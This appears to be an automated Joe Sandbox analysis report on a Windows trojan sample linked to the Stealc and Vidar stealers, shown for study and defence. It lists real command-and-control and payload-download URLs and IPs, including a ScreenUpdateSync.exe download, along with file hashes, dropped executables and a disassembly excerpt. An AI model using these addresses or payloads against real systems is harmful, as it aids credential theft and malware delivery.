http://62.204.41.177/edd20096ecef326d.phpfj | 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.6.dr | false | URL Reputation: safe | unknown
https://post-to-me.com/6 | mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEf | mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://176.113.115.37/ScreenUpdateSync.exe | mCe4hBfqCT.exe, mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177/edd20096ecef326d.php1nZ | 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://62.204.41.177 | 64A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://176.113.115.37/ScreenUpdateSync.exe) | mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.37 | unknown | Russian Federation | 49505 | SELECTELRU | false
62.204.41.177 | unknown | United Kingdom | 30798 | TNNET-ASTNNetOyMainnetworkFI | true
104.21.56.70 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542736
Start date and time: 2024-10-26 08:55:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: mCe4hBfqCT.exe (renamed because original name is a hash value)
Original Sample Name: 5b01b239f2b48841380e3665d1c3f98a.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/7@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 51
• Number of non-executed functions: 376
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.20
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:56:06 | API Interceptor | 9996688x Sleep call for process: mCe4hBfqCT.exe modified
02:56:39 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
176.113.115.37 | BKoQ3DF8eD.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | v2hvYA53Ys.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | Zl5QaBwsTJ.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | sgM0Akbldk.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | VAIIBIHmtT.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
176.113.115.37 | M13W1o3scc.exe | malicious | Stealc | 176.113.115.37/ScreenUpdateSync.exe
176.113.115.37 | XQywAEbb9e.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
176.113.115.37 | file.exe | malicious | Stealc, Vidar | 176.113.115.37/seed.exe
62.204.41.177 | Ondso1o6Yz.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | BKoQ3DF8eD.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | ZDW7Di1Ykf.exe | malicious | Stealc, Vidar | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | cdc57Mn7dE.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | v2hvYA53Ys.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | 5ee78ca100f37486e25795012e502d905d864fe4dedf0.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | Zl5QaBwsTJ.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | sgM0Akbldk.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | VAIIBIHmtT.exe | malicious | Stealc | 62.204.41.177/edd20096ecef326d.php
62.204.41.177 | v32oH5Xhqw.exe | malicious | Stealc, Vidar | 62.204.41.177/edd20096ecef326d.php

Match | Associated Sample Name / URL | Detection | Threat Name | Context
post-to-me.com | BKoQ3DF8eD.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | v2hvYA53Ys.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | Zl5QaBwsTJ.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | sgM0Akbldk.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | VAIIBIHmtT.exe | malicious | Stealc | 104.21.56.70
post-to-me.com | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 172.67.179.207
post-to-me.com | hlyG1m5UmO.exe | malicious | Stealc, Vidar | 104.21.56.70
post-to-me.com | M13W1o3scc.exe | malicious | Stealc | 172.67.179.207
post-to-me.com | InstallSetup.exe | malicious | Stealc | 172.67.179.207

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20 | malicious | HTMLPhisher, Mamba2FA | 188.114.97.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
CLOUDFLARENETUS | transferencia interbancaria_667553466579.xlam.xlsx | malicious | AgentTesla | 188.114.96.3
CLOUDFLARENETUS | 8m9f0jVE2G.exe | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | Hxn7F5YIYJ.lnk | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | 8m9f0jVE2G.exe | malicious | Unknown | 104.26.14.67
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
CLOUDFLARENETUS | CheatInjector.exe | malicious | LummaC | 104.21.95.91
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.95.91
CLOUDFLARENETUS | SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exe | malicious | Unknown | 104.18.10.89
SELECTELRU | BKoQ3DF8eD.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | v2hvYA53Ys.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | Zl5QaBwsTJ.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | sgM0Akbldk.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | VAIIBIHmtT.exe | malicious | Stealc | 176.113.115.37
SELECTELRU | la.bot.sh4.elf | malicious | Unknown | 92.53.102.17
SELECTELRU | la.bot.powerpc.elf | malicious | Unknown | 95.213.162.65
SELECTELRU | SecuriteInfo.com.Program.RemoteAdmin.904.16436.20637.exe | malicious | FlawedAmmyy | 95.213.191.237
SELECTELRU | jYDYjpSbvf.exe | malicious | LummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, Stealc | 176.113.115.95
SELECTELRU | CHHE6LLjWx.exe | malicious | Stealc, Vidar | 176.113.115.37
TNNET-ASTNNetOyMainnetworkFI | Ondso1o6Yz.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | BKoQ3DF8eD.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | ZDW7Di1Ykf.exe | malicious | Stealc, Vidar | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | cdc57Mn7dE.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | v2hvYA53Ys.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | 5ee78ca100f37486e25795012e502d905d864fe4dedf0.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | Zl5QaBwsTJ.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | sgM0Akbldk.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | VAIIBIHmtT.exe | malicious | Stealc | 62.204.41.177
TNNET-ASTNNetOyMainnetworkFI | v32oH5Xhqw.exe | malicious | Stealc, Vidar | 62.204.41.177

Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | H33UCslPzv.exe | malicious | XWorm | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | factura Fvsae2400398241025.pdf.exe | malicious | FormBook, GuLoader | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exe | malicious | Unknown | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | BKoQ3DF8eD.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | Rampage.exe | malicious | CredGrabber, Meduza Stealer | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | v2hvYA53Ys.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | Zl5QaBwsTJ.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | sgM0Akbldk.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | VAIIBIHmtT.exe | malicious | Stealc | 104.21.56.70
37f463bf4616ecd445d4a1937da06e19 | RFQ_24196MR_PDF.vbs | malicious | GuLoader | 104.21.56.70
                                                No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9627117858697094
Encrypted: false
SSDEEP: 192:ozgVapn0E5n82jMhZrMZlzuiFvZ24IO8B:Zap0E5n82jjrzuiFvY4IO8B
MD5: F62E2573BD974D4F3DE79738504E7150
SHA1: B407ECE643AE4A35CB7C6849D4CB6B09E4D106EA
SHA-256: 8CF7862BB9D81D67157A1D99299ED261CAB245DF3C791BE3E2A0B5C0EA34C46B
SHA-512: 23D2071C6048A038E01F0245585FF556359357D472DC57C89DADB3813A36DB6690100867F8B44583D193DB6569358269264B694DD4C399E78171A698A8EACC17
Malicious: false
Reputation: low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.9.9.3.7.8.3.4.3.6.5.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.9.9.3.7.8.9.3.7.4.1.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.e.7.9.d.2.5.-.d.9.0.4.-.4.3.8.b.-.8.8.a.c.-.c.2.6.c.e.b.4.9.f.3.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.7.3.f.d.d.5.-.f.6.d.b.-.4.1.c.7.-.b.1.3.a.-.1.a.b.9.f.9.c.5.a.a.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.4.A...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.8.-.0.0.0.1.-.0.0.1.4.-.b.4.5.1.-.7.2.2.3.7.4.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.c.a.9.c.5.e.c.a.3.6.a.f.5.b.c.1.6.c.b.9.8.3.d.8.f.f.f.8.f.a.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.5.f.5.7.8.9.3.d.e.5.0.e.1.3.a.4.2.a.e.a.f.0.b.9.0.5.c.5.3.2.2.0.4.5.8.a.1.3.!.6.4.A...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 14 streams, Sat Oct 26 06:56:18 2024, 0x1205a4 type
Category: dropped
Size (bytes): 60932
Entropy (8bit): 1.9174833799659234
Encrypted: false
SSDEEP: 192:VhrPwXhWXu9usXjiOEOJwcJySfRi/tI25Jn1WG5Mnie12Y+qIHH+E6yL0:VVU2u95EEJYSfRELOv1wqJEl0
MD5: 8E034F635C564267B2A1EA7A3680F067
SHA1: 7DD3FD8AA4EFE55757FA7FDFF1C8A8E157D77556
SHA-256: 7273AC67ADE669B0AAFDDA3FAD62503F1BF33878679997ECB84ED7E981FB83AC
SHA-512: A3349491D61F05B36798A37A463796DBA2F4EB1CCA1583F1666EA2ACE62EAA4D5A7B9FCE74B6F9C59A92CAEA0AE2B959C4AB6CDFD4BCA49E9308881A848E73F2
Malicious: false
Reputation: low
                                                Preview:MDMP..a..... ..........g............4...............<............*..........T.......8...........T............3..<.......................................................................................................eJ......H.......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8312
Entropy (8bit): 3.6973361989944395
Encrypted: false
SSDEEP: 192:R6l7wVeJUL686YYs+6FgmfFcspDH89bnrsfEVxNm:R6lXJo686YY96FgmfFc5nwfuS
MD5: 3C75E34541DFE5211119031813437FF3
SHA1: DA454CEAFD16AE9C8499C6968829B388BF7E1464
SHA-256: 351F1C60287EAE0755C4CB8042D7F8E771CC8C5A3A382C6924F97DC064EB73D9
SHA-512: BDC6B629203B8A15030D01AD87FE049B84BE8735BE49D18B25BE805FB45E2B97C104818E236DE8D46FE95E89A8BE2A532AE4DD5D73E61693508E91088C118B8B
Malicious: false
Reputation: low
                                                Preview (UTF-16 decoded):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5576</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4558
                                                Entropy (8bit):4.434280741444019
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsRrJg77aI9kvWpW8VYxYm8M4JhfFj4+q8ULSjQYpusd:uIjfRFI7K+7V1JQhSj3pusd
                                                MD5:6AD644A134F2C3C2AD14A0CDC77B7A4E
                                                SHA1:DAD565458CFB0FCD5F4CD1B847B942ADC7068459
                                                SHA-256:C43D9FC75893361E914C297C20E23AEC778E58C7AE56BB3BAC6F3A83C6A43321
                                                SHA-512:F2092267FF73BF75DE18F9AF19DE77218E2C3B510395B1473AC4D42D695B801A25F45221662ED91253416522B670A071ABE9B1FC5AAD4B2C2A606EFBF6919730
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560039" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):352256
                                                Entropy (8bit):6.75440309490664
                                                Encrypted:false
                                                SSDEEP:6144:JTacvuKojyXqaDIBuWpui2LbDDGxeQnwV65U8Lz:JThuhjyqn7uLGxzG65Ue
                                                MD5:676EE4608A4ABD53EBDD6B380C2A3817
                                                SHA1:DA5F57893DE50E13A42AEAF0B905C53220458A13
                                                SHA-256:12997D7BDC9533FE81E634534A82CDD01D79A3F7106CF25ADA0C048B9ACC8D64
                                                SHA-512:1ECD00BFD305430344567C62AE86E2765427EF40BF0732A5D9AF1C5CBC7A22AB8FFCCF3EA62891BD44DE6A5018840B23D6ECC1661ABD0F4322A48A8DB93B6AF6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 45%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..7..7..7...x?.7..e-.7..e<.7..e*..7......7..7...7..e#.7..e=.7..e8.7..Rich.7..................PE..L......e.................p...Dr...................@...........................u.....M...........................................<.... t.8{...........................................................................................................text...po.......p.................. ..`.rdata..P".......$...t..............@..@.data...|.p.........................@....nuhi....D....s..8..................@....rsrc...8{... t..|..................@..@........................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\mCe4hBfqCT.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):352256
                                                Entropy (8bit):6.75440309490664
                                                Encrypted:false
                                                SSDEEP:6144:JTacvuKojyXqaDIBuWpui2LbDDGxeQnwV65U8Lz:JThuhjyqn7uLGxzG65Ue
                                                MD5:676EE4608A4ABD53EBDD6B380C2A3817
                                                SHA1:DA5F57893DE50E13A42AEAF0B905C53220458A13
                                                SHA-256:12997D7BDC9533FE81E634534A82CDD01D79A3F7106CF25ADA0C048B9ACC8D64
                                                SHA-512:1ECD00BFD305430344567C62AE86E2765427EF40BF0732A5D9AF1C5CBC7A22AB8FFCCF3EA62891BD44DE6A5018840B23D6ECC1661ABD0F4322A48A8DB93B6AF6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 45%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..7..7..7...x?.7..e-.7..e<.7..e*..7......7..7...7..e#.7..e=.7..e8.7..Rich.7..................PE..L......e.................p...Dr...................@...........................u.....M...........................................<.... t.8{...........................................................................................................text...po.......p.................. ..`.rdata..P".......$...t..............@..@.data...|.p.........................@....nuhi....D....s..8..................@....rsrc...8{... t..|..................@..@........................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.4214488866772115
                                                Encrypted:false
                                                SSDEEP:6144:OSvfpi6ceLP/9skLmb0OThWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:tvloThW+EZMM6DFyF03w
                                                MD5:8539CBB7A25CE4584D7D072730A7AD6F
                                                SHA1:7EFEF0AF514D393D5F955090B8E8C17DDE8E668C
                                                SHA-256:38080E03EC6FBF4E69592A2BB53720628FD6D6CF6EFE7A4BBC717F3A48BB468F
                                                SHA-512:DA4BEFAE714BCEB1B7C1B1A7E02ADCC1F97E37A8B85E39232BDB74A7A0B5B016F8E9733DDD22DC0ADB73BB09E289E1C3CF5AD53691A496F0476AEC14CA1CE0E8
                                                Malicious:false
                                                Reputation:low
                                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj.;(t'...............................................................................................................................................................................................................................................................................................................................................F,.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.117334713665558
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:mCe4hBfqCT.exe
                                                File size:430'592 bytes
                                                MD5:5b01b239f2b48841380e3665d1c3f98a
                                                SHA1:ae35e49abca5950c5be20ef121ee8d74a903b877
                                                SHA256:8c32b0c595db81613c72044bb9d2d3d8170916760d30b7bf0c9710da462a2bb2
                                                SHA512:bd9f4fd807e3f9f85c6e4f14422b679434ac69e71a04fcb528a1a1a1f2277d16470d2a1460a6b0673400b2b055021ac2511c081cb74446acdf42cd1f2e7cd2dd
                                                SSDEEP:6144:frTpE9olFDU37c3s0IcJwjn5AK9fG65Z8xeFi0QoWOL5TeSAV65UCz:fi2lO37c3s2YAkfjM0QoJLkS265UC
                                                TLSH:A794CFE0A5F19527E3F39A781975A7B81E7FB8A7AD30934F2260124E3D713D28921713
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7...7...7...x?..7...e-..7...e<..7...e*..7.......7...7...7...e#..7...e=..7...e8..7..Rich.7..................PE..L.....Td...
                                                Icon Hash:46c7c30b0f4e0d59
                                                Entrypoint:0x40171f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x645488AA [Fri May 5 04:40:10 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:085d13fdef154decb8c8ad4679e90db7
                                                Instruction
                                                call 00007F0D58E44AC6h
                                                jmp 00007F0D58E4145Dh
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000328h
                                                mov dword ptr [00450480h], eax
                                                mov dword ptr [0045047Ch], ecx
                                                mov dword ptr [00450478h], edx
                                                mov dword ptr [00450474h], ebx
                                                mov dword ptr [00450470h], esi
                                                mov dword ptr [0045046Ch], edi
                                                mov word ptr [00450498h], ss
                                                mov word ptr [0045048Ch], cs
                                                mov word ptr [00450468h], ds
                                                mov word ptr [00450464h], es
                                                mov word ptr [00450460h], fs
                                                mov word ptr [0045045Ch], gs
                                                pushfd
                                                pop dword ptr [00450490h]
                                                mov eax, dword ptr [ebp+00h]
                                                mov dword ptr [00450484h], eax
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [00450488h], eax
                                                lea eax, dword ptr [ebp+08h]
                                                mov dword ptr [00450494h], eax
                                                mov eax, dword ptr [ebp-00000320h]
                                                mov dword ptr [004503D0h], 00010001h
                                                mov eax, dword ptr [00450488h]
                                                mov dword ptr [00450384h], eax
                                                mov dword ptr [00450378h], C0000409h
                                                mov dword ptr [0045037Ch], 00000001h
                                                mov eax, dword ptr [0044F004h]
                                                mov dword ptr [ebp-00000328h], eax
                                                mov eax, dword ptr [0044F008h]
                                                mov dword ptr [ebp-00000324h], eax
                                                call dword ptr [000000ECh]
                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4d8ac | 0x3c | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2756000 | 0x17b38 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4d468 | 0x40 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x4c000 | 0x1a8 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x4a190 | 0x4a200 | 23b7deb78d2b7a1548ad8662b90bda3b | False | 0.8787712110033726 | data | 7.6672496441732925 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x4c000 | 0x2250 | 0x2400 | 71599186f795ee89d63c2cd43413650e | False | 0.3565538194444444 | data | 5.433114795032559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0x4f000 | 0x270107c | 0x1400 | f9709805ace1b5d9cb1e2d277ecaa6e2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .meridu | 0x2751000 | 0x4400 | 0x3800 | b211778b80f6d441b6cf61ada776fc6d | False | 0.0025809151785714285 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc | 0x2756000 | 0x17b38 | 0x17c00 | f1a8bd2362ed8f9d8a430e6a9761cf89 | False | 0.5783203125 | data | 5.801537597469369 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
